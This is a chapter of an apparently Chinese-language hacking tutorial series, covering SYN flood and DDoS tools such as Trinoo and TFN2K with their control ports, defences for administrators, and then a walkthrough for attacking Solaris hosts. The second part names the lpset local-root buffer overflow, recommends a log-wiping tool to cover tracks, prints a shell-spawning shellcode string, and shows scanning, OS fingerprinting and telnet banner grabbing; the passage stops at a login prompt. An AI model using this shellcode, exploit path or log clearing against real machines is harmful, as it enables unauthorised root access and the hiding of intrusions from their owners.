爱爱小说网 > 体育电子书 > 30天打造专业红客 >

第15章

30天打造专业红客-第15章

小说: 30天打造专业红客 字数: 每页3500字

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!



主机以高速度发送大量的数据包,导致它死机或是无法响应正常的请求。黑客一般会以远远超出受害方处理能力的速度进行攻击,他们不会〃怜香惜玉〃。
      老到的攻击者一边攻击,还会用各种手段来监视攻击的效果,在需要的时候进行一些调整。简单些就是开个窗口不断地ping目标主机,在能接到回应的时候就再加大一些流量或是再命令更多的傀儡机来加入攻击。 
    下面我们再详细说说SYN Flood攻击
    SYN…Flood是目前最流行的DDoS攻击手段,早先的DoS的手段在向分布式这一阶段发展的时候也经历了浪里淘沙的过程。SYN…Flood的攻击效果最好,应该是众黑客不约而同选择它的原因吧。那么我们一起来看看SYN…Flood的详细情况。
    Syn Flood原理 … 三次握手
      Syn Flood利用了TCP/IP协议的固有漏洞。面向连接的TCP三次握手是Syn Flood存在的基础。 
    TCP连接的三次握手 
    如图,在第一步中,客户端向服务端提出连接请求。这时TCP SYN标志置位。客户端告诉服务端序列号区域合法,需要检查。客户端在TCP报头的序列号区中插入自己的ISN。服务端收到该TCP分段后,在第二步以自己的ISN回应(SYN标志置位),同时确认收到客户端的第一个TCP分段(ACK标志置位)。在第三步中,客户端确认收到服务端的ISN(ACK标志置位)。到此为止建立完整的TCP连接,开始全双工模式的数据传输过程。
    Syn Flood攻击者不会完成三次握手 
    假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒…2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃…即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,这种情况我们称做:服务器端受到了SYN Flood攻击(SYN洪水攻击)。
    下面我们来分析一下这些经典的黑客程序。
    1、Trinoo
    Trinoo的攻击方法是向被攻击目标主机的随机端口发出全零的4字节UDP包,在处理这些超出其处理能力的垃圾数据包的过程中,被攻击主机的网络性能不断下降,直到不能提供正常服务,乃至崩溃。它对IP地址不做假,采用的通讯端口是:
      攻击者主机到主控端主机:27665/TCP
      主控端主机到代理端主机:27444/UDP
      代理端主机到主服务器主机:31335/UDP
    2、TFN
    TFN由主控端程序和代理端程序两部分组成,它主要采取的攻击方法为:SYN风暴、Ping风暴、UDP炸弹和SMURF,具有伪造数据包的能力。
    3、TFN2K
    TFN2K是由TFN发展而来的,在TFN所具有的特性上,TFN2K又新增一些特性,它的主控端和代理端的网络通讯是经过加密的,中间还可能混杂了许多虚假数据包,而TFN对ICMP的通讯没有加密。攻击方法增加了Mix和Targa3。并且TFN2K可配置的代理端进程端口。
    4、Stacheldraht
    Stacheldraht也是从TFN派生出来的,因此它具有TFN的特性。此外它增加了主控端与代理端的加密通讯能力,它对命令源作假,可以防范一些路由器的RFC2267过滤。Stacheldrah中有一个内嵌的代理升级模块,可以自动下载并安装最新的代理程序。
    DDoS的监测
    检测DDoS攻击的主要方法有以下几种:
    1、根据异常情况分析
      当网络的通讯量突然急剧增长,超过平常的极限值时,你可一定要提高警惕,检测此时的通讯;当网站的某一特定服务总是失败时,你也要多加注意;当发现有特大型的ICP和UDP数据包通过或数据包内容可疑时都要留神。总之,当你的机器出现异常情况时,你最好分析这些情况,防患于未然。
    2、使用DDoS检测工具
      当攻击者想使其攻击阴谋得逞时,他首先要扫描系统漏洞,目前市面上的一些网络入侵检测系统,可以杜绝攻击者的扫描行为。另外,一些扫描器工具可以发现攻击者植入系统的代理程序,并可以把它从系统中删除。
    DDoS的防范
    到目前为止,进行DDoS攻击的防御还是比较困难的。首先,这种攻击的特点是它利用了TCP/IP协议的漏洞,除非你不用TCP/IP,才有可能完全抵御住DDoS攻击。一位资深的安全专家给了个形象的比喻:DDoS就好象有1;000个人同时给你家里打电话,这时候你的朋友还打得进来吗?
      不过即使它难于防范,也不是说我们就应该逆来顺受,实际上防止DDoS并不是绝对不可行的事情。互联网的使用者是各种各样的,与DDoS做斗争,不同的角色有不同的任务。我们以下面几种角色为例: 
    企业网管理员 
    ISP、ICP管理员 
    骨干网络运营商
      企业网管理员
      网管员做为一个企业内部网的管理者,往往也是安全员、守护神。在他维护的网络中有一些服务器需要向外提供WWW服务,因而不可避免地成为DDoS的攻击目标,他该如何做呢?可以从主机与网络设备两个角度去考虑。
      主机上的设置
      几乎所有的主机平台都有抵御DoS的设置,总结一下,基本的有几种: 
    关闭不必要的服务 
    限制同时打开的Syn半连接数目 
    缩短Syn半连接的time out 时间 
    及时更新系统补丁
    网络设备上的设置
      企业网的网络设备可以从防火墙与路由器上考虑。这两个设备是到外界的接口设备,在进行防DDoS设置的同时,要注意一下这是以多大的效率牺牲为代价的,对你来说是否值得。
      1。防火墙 
    禁止对主机的非开放服务的访问 
    限制同时打开的SYN最大连接数 
    限制特定IP地址的访问 
    启用防火墙的防DDoS的属性 
    严格限制对外开放的服务器的向外访问
      第五项主要是防止自己的服务器被当做工具去害人。
      2。路由器 
    以Cisco路由器为例 
    Cisco Express Forwarding(CEF) 
    使用 unicast reverse…path 
    访问控制列表(ACL)过滤 
    设置SYN数据包流量速率 
    升级版本过低的ISO 
    为路由器建立log server
      其中使用CEF和Unicast设置时要特别注意,使用不当会造成路由器工作效率严重下降,升级IOS也应谨慎。路由器是网络的核心设备,与大家分享一下进行设置修改时的小经验,就是先不保存。Cisco路由器有两份配置startup config和running config,修改的时候改变的是running config,可以让这个配置先跑一段时间(三五天的就随意啦),觉得可行后再保存配置到startup config;而如果不满意想恢复原来的配置,用copy start run就行了。
      ISP / ICP管理员
      ISP / ICP为很多中小型企业提供了各种规模的主机托管业务,所以在防DDoS时,除了与企业网管理员一样的手段外,还要特别注意自己管理范围内的客户托管主机不要成为傀儡机。客观上说,这些托管主机的安全性普遍是很差的,有的连基本的补丁都没有打就赤膊上阵了,成为黑客最喜欢的〃肉鸡〃,因为不管这台机器黑客怎么用都不会有被发现的危险,它的安全管理太差了;还不必说托管的主机都是高性能、高带宽的…简直就是为DDoS定制的。而做为ISP的管理员,对托管主机是没有直接管理的权力的,只能通知让客户来处理。在实际情况时,有很多客户与自己的托管主机服务商配合得不是很好,造成ISP管理员明知自己负责的一台托管主机成为了傀儡机,却没有什么办法的局面。而托管业务又是买方市场,ISP还不敢得罪客户,怎么办?咱们管理员和客户搞好关系吧,没办法,谁让人家是上帝呢?呵呵,客户多配合一些,ISP的主机更安全一些,被别人告状的可能性也小一些。
      骨干网络运营商
    这个我们就不说了
    因为我们都不是骨干运营商 
    『第26天』Sunos (一)
    今天我想给大家介绍的是Sunos 。 Sunos是一个非常好的Unix操作系统,功能强大。很多大型公司都采用此系统作为服务器系统。(例如:sina、163等。)至于它的漏洞,也是多不胜数的了。今天我就介绍一下这个系统的漏洞。
    Unix:Unix操作系统自70年代由贝尔实验室推出以来,80年代经过大学、研究所、工业实验室的应用和发展,现已成为全球各大学、研究所及工业研究室、计算机网络通信、工作站系统的主流工具,并开始进入商业市场和个人电脑领域。尤其是美国在1994年率先提出信息高速公路(Information Super Highway)的构想,更UNIX的发展应用推波助澜。到目前为止UNIX用户已经达到200万户,其成长速度之惊人,前所未有。UNIX提供多用户、多任务的操作环境,其网络工具使计算机远程通信、并行处理、资源分配等有了更广阔的应用前景。尤其是它的X Window系统函盖了传统的DOS命令行和视窗系统的优点。
     
    Solaris与Sunos的版本转换:
    Solaris 8 = Sunos 5。8,Solaris 7 = Sunos 5。7,Solaris 2。6 = Sunos 5。6,Solaris 2。5 = Sunos 5。5……
    因为自Sunos 5以后,就叫Solaris了。
    Solaris也有分服务器版和个人版,它们分别是:
    服务器版:sparc
    个人版:x86
    通常个人是不会安装Solaris的。
    Solaris主要的漏洞有:
    远程漏洞:
    RPC:
    rpc。ttdbserverd :Solaris 2。3,2。4, 2。5, 2。5。1, 2。6 
    rpc。cmsd:Solaris 2。5, 2。5。1, 2。6, 7 
    其他:
    sadmind:solaris 2。6, 7 
    snmpXdmid:Solaris 7, 8 
    本地漏洞:
    lpset:Solaris 2。6,7
    本次范例需要的系统及程序情况如下:
    操作系统:Window2000
    对方操作系统:Sunos 5。7 (solaris 7)
    程序(一):lpset。c
    程序(二):Superscan 3。0
    程序(二):wipe…1。00
    本机IP:127。0。0。1
    测试IP:127。0。0。17
    新程序说明:
    “lpset。c”是利用solaris 7和solaris 2。6的/usr/bin/lpset …a 缓冲区溢出漏洞所写的一个exploit。
    Solaris 7 lpset …a 缓冲区溢出漏洞 
    Solaris 2。6和Solaris 7中所带的lpset缺省设置了suid root位,它的一个执行选项〃…a〃在处
    理时存在问题,它会将提供给〃…a〃的参数不加判断的拷贝到一个固定大小的buffer(900多字节)
    中;当用户提供一个包含可执行代码的很长的字符串时,将导致lpset以root身份执行任意命令。
    尽管lpset缺省只允许root和sysadm组的用户执行,但是,由于溢出发生在进行执行权限判断操
    作之前,任意本地用户都可以利用这个漏洞获取root权限。
    wipe…1。00:unix和liunx下,一个非常好用的日志清除程序。
    新名词讲解:
    肉鸡:已经被攻击了,具有控制权的主机。
    跳板:利用此主机作跳板,攻击其他主机。
    shell:shell是系统与用户的交换式界面。简单来说,就是系统与用户的“沟通”环境。我们平时经常用到的DOS,就是一个shell。(Windows2000是cmd。exe)
    root:Unix里最高权限的用户。也就是超级管理员。
    admin:Windows NT里最高权限的用户。也就是超级管理员。
    rootshell:通过一个溢出程序,在主机溢出一个具有root权限的shell。
    exploit:溢出程序。exploit里通常包含一些shellcode。
    shellcode:溢出攻击要调用API函数,溢出后要有一个交换式界面进行操作。所以就有了shell的code。
    char shellcode'' = 〃x31xdbx31xc9x31xc0xb0x46xcdx80〃 〃x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8〃 〃x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89〃 〃x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0〃 〃x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd〃 〃x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9〃 〃xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75〃 〃x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08〃 〃x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh〃;
    这就是一个shellcode。
    找一个Unix主机也是一种技巧。
    1、首先,我们打开superscan。
    设置:
    IP:(需要扫描的IP地址。)
    Start:127。0。0。1
    Stop:127。0。0。255
    Scan Type:(扫描类型设置。)
    All ports from:23|23
    然后,点击“Start”,开始扫描。 
    2、点击“Prune”,把多余的主机删除。 
    3、点击“Expand All”,把所有扫描到的主机打开。这时,在端口下面就会显示一些信息。这些信息就是端口的响应。 
    小技巧: 
    。。。。。。。。#。。'。。:这种响应,通常是Sunos主机的。 
    。。。。。 。。#。。':这种响应,通常是liunx的。 
    假设,我们扫描到:127。0。0。17。 
    打开,Windows自带的“命令提示符”。
    ping 主机:
    主要目的是查看主机是否能连接。
    D:》ping 127。0。0。17
    Pinging 127。0。0。17 with 32 bytes of data:
    Reply from 127。0。0。17: bytes=32 time=191ms TTL=241
    Reply from 127。0。0。17: bytes=32 time=170ms TTL=241
    Reply from 127。0。0。17: bytes=32 time=160ms TTL=241
    Reply from 127。0。0。17: bytes=32 time=170ms TTL=241
    Ping statistics for 127。0。0。17:
     Packets: Sent = 4; Received = 4; Lost = 0 (0% loss);
    Approximate round trip times in milli…seconds:
     Minimum = 160ms; Maximum =  191ms; Average =  172ms
    小技巧:
    通常 TTL 》 200的,都是liunx或者unix系统。
    TTL 《 200的,都是Windows 9x或Windows NT系统。
    telnet主机:
    主要看看telnet的banner。
    D:》telnet 127。0。0。17
    SunOS 5。7
    login:
    

返回目录 上一页 下一页 回到顶部 0 1

你可能喜欢的